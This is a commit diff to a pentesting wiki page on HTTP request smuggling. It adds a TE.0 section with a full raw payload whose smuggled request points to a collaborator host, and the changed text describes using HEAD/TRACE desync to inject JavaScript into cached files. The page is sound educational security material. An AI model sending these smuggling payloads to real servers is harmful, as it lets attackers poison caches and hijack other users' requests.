GITBOOK-4372: No subject

Author: carlospolop

pentesting-web/http-request-smuggling/README.md

@@ -1,8 +1,8 @@
 # HTTP Request Smuggling / HTTP Desync Attack
 
 {% hint style="success" %}
-Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
-Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 
 <details>
 
@@ -60,6 +60,10 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
 
 ![https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
 
+{% hint style="info" %}
+To the previous table you should add the TE.0 technique, like CL.0 technique but using Transfer Encoding.
+{% endhint %}
+
 #### CL.TE Vulnerability (Content-Length used by Front-End, Transfer-Encoding used by Back-End)
 
 * **Front-End (CL):** Processes the request based on the `Content-Length` header.
@@ -137,7 +141,7 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
       : chunked
       ```
 
-#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End):**
+#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End)**
 
 * Both servers process the request based solely on the `Content-Length` header.
 * This scenario typically does not lead to smuggling, as there's alignment in how both servers interpret the request length.
@@ -152,9 +156,9 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
     Normal Request
     ```
 
-#### **CL != 0 Scenario:**
+#### **CL.0 Scenario**
 
-* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content.
+* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. The back-end ignores the `Content-Length` header (which is treated as 0), but the front-end parses it.
 * It's crucial in understanding and crafting smuggling attacks, as it influences how servers determine the end of a request.
 *   **Example:**
 
@@ -167,6 +171,30 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
     Non-Empty Body
     ```
 
+#### TE.0 Scenario
+
+* Like the previous one but using TE
+* Technique [reported here](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
+* **Example**:
+
+```
+OPTIONS / HTTP/1.1
+Host: {HOST}
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
+Transfer-Encoding: chunked
+Connection: keep-alive
+
+50
+GET <http://our-collaborator-server/> HTTP/1.1
+x: X
+0
+EMPTY_LINE_HERE
+EMPTY_LINE_HERE
+```
+
 #### Breaking the web server
 
 This technique is also useful in scenarios where it's possible to **break a web server while reading the initial HTTP data** but **without closing the connection**. This way, the **body** of the HTTP request will be considered the **next HTTP request**.
@@ -550,7 +578,7 @@ X-Forwarded-For: xxx.xxx.xxx.xxx
 ```
 
 An example on how to abuse this behaviour would be to **smuggle first a HEAD request**. This request will be responded with only the **headers** of a GET request (**`Content-Type`** among them). And smuggle **immediately after the HEAD a TRACE request**, which will be **reflecting the sent dat**a.\
-As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response. \
+As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response.\
 This response will be sent to the next request over the connection, so this could be **used in a cached JS file for example to inject arbitrary JS code**.
 
 ### Abusing TRACE via HTTP Response Splitting <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
@@ -735,10 +763,11 @@ def handleResponse(req, interesting):
 * [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html)
 * [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
 * [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack)
+* [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
 
 {% hint style="success" %}
-Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
-Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 
 <details>